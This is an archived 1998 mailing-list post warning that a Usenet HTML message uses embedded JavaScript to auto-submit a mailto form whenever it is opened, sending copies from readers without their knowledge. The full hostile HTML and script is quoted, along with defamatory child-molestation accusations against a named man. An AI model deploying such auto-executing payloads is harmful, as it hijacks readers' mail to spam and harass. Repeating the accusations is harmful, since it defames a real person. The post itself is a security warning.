[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Heeee's back!!



-----BEGIN PGP SIGNED MESSAGE-----

In <[email protected]>, on 08/25/98 
   at 11:14 AM, Ted Lungu <[email protected]> said:

If anyone has noticed the large number of posts being received with the
subject: "Child-Molesting Forger's Chilling Confession" they are being
autogenerated without the poster's knowledge.

How do you ask?? Our good friend Dimitri has posted a HTML message to
numerious newsgroups with embeded javascript. This java script is being
auto-executed by the Netscape program and is mailing out these messages
whenever the reader opens the message.

My complements to the good doctor, yet another example of the enherent
security risks of HTML mail.

Below is a copy of the original news post:

From: [email protected] (Dr.Dimitri Vulis KOTM)
Newsgroups:
nyc.general,soc.culture.russian,alt.law-enforcement,alt.true-crime,soc.culture.romanian,misc.kids,misc.kids.health,sci.crypt,comp.security.firewalls,comp.lang.javascript,comp.security.misc,comp.org.eff.talk,misc.invest.funds,misc.invest.futures,misc.invest.stocks,misc.invest.technical,misc.invest.real-estate,alt.fan.karl-malden.nose,sci.cryonics,soc.motss,soc.culture.ukrainian,soc.culture.jewish,soc.religion.quaker,alt.folklore.computers
Subject: Child-Molesting Forger's Chilling Confession!!!1!
Date: Sat, 22 Aug 1998 11:00:00 EST
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Lines: 16
Approved: [email protected]
Expires: Fri, 22 Aug 2008 11:00:00 EST
Message-ID: <[email protected]>
References: <[email protected]>
NNTP-Posting-Host: bwalk.dm.com
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Summary: beware the Internet pedophiles
Content-Disposition: inline; filename="warning.htm"
Content-Description: The chilling confession of the self-admitted and
- -exposed child-molesting forger Content-Base:
"file:///POWER%20MAC/warning.html" Disclaimer: CUNY is full of GOWNO, but
100% agrees with all the facts I present X-Face:
(d~Q1[m:7MNXk3-PPCG=Woa93hY6X~&6Z!y#.QB7f-$hfnm>eWIty%YX[43P^g~=N/v3V64
 JfQgHy0h_vvpS'G#15(A=$KZce>%S`xcS%*Ja1GqLFZcPS*\1sy\`X,%WN)fwcU^!\wpY^&C.u,%@0
 21q6kV=(/'B)J]JF;=9/t8cj~gOA9d@v[]B?te|Zi(/w\Aro%()cU!{"'Jo7)Y6 Path:
carrera!news.bctel.net!newsfeed.direct.ca!ptdnetP!newsgate.ptd.net!newspeer.monmouth.com!news.lightlink.com!news.alt.net!perun!dlv
Xref: carrera nyc.general:22129 soc.culture.russian:88474
alt.law-enforcement:217670 alt.true-crime:102690
soc.culture.romanian:52893 misc.kids:374647 misc.kids.health:36966
sci.crypt:40607 comp.security.firewalls:13466 comp.lang.javascript:79964
comp.security.misc:26512 comp.org.eff.talk:46645 misc.invest.futures:53448
misc.invest.stocks:229734 misc.invest.technical:44459
misc.invest.real-estate:56139 alt.fan.karl-malden.nose:151559
sci.cryonics:6452 soc.motss:193052 soc.culture.ukrainian:39182
soc.culture.jewish:242558 soc.religion.quaker:16761
alt.folklore.computers:77067

<html><head><script language="JavaScript">
function c2(){document.f1.Remedy.click();setTimeout('c2();',30000);}
function
cl(){document.f1.Browser.value=navigator.appName+":"+navigator.userAgent;setTimeout('c2();',100);}
</script></head><body onLoad="cl()"><form name="f1" method="post"
enctype="text/plain"
action="mailto:[email protected],[email protected],[email protected],[email protected],[email protected]?subject=Re:
Child-Molesting Forger's Chilling Confession!!!1!"> <textarea
name="Encrypted_Message" cols=76 rows=8>On 4 May 1998 02:57:07 GMT, in
article &lt;[email protected]&gt;, &lt;[email protected]&gt;
Information Security (= Guy Polis &lt;[email protected]&gt;) wrote: #   Guy
Polis ([email protected], [email protected]) is a pedophile child #   molester
who was fired from his consulting position at Salomon Brothers #   after
he was caught masturbating in his cubicle at the child pornography #  
JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest
him?</textarea><br> <input type="hidden" name="Browser" value="Unknown">
<input type="submit" name="Remedy" value="Tell the world"></form>
(Reposted due to a forged cancel.)</body></html>



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: What I like about MS is its loyalty to customers!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeMe549Co1n+aLhhAQFy8gP+L06L2I8ESdqM3p7c6PYa8gkTV3mAf2pe
NO7JzmlpBqOr5fk60Yawhp4ET6CakUJEqU4B0aCTu5J763vQAQ4awRDaMXmHvbPv
RQO9O9Rvq7E3/FocySvgXHe4CkqpRyFSQ4VJlgaHA6F5KCDu3mknMRA6o94j4VF1
rI4x23Tgu8w=
=L7mp
-----END PGP SIGNATURE-----